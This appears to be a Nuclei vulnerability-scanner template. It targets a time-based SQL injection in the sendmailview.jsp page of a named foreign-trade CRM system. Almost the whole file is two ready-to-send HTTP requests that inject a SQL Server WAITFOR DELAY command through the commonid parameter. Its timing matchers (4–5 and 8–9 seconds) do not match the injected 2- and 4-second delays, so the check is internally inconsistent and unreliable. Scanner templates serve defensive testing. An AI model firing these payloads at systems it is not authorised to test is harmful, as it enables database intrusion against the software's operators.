id: weidawaimao-sendmailview_jsp-sql-time

info:
  name: 维达外贸客户关系管理系统 sendmailview.jsp SQL注入漏洞
  author: xxx
  severity: high
  tags: sql injection

http:
  - raw:
      - |
        GET /wap/common/sendmailview.jsp?commonid=1';WAITFOR+DELAY+'0:0:2'-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
      - |
        GET /wap/common/sendmailview.jsp?commonid=1';WAITFOR+DELAY+'0:0:4'-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and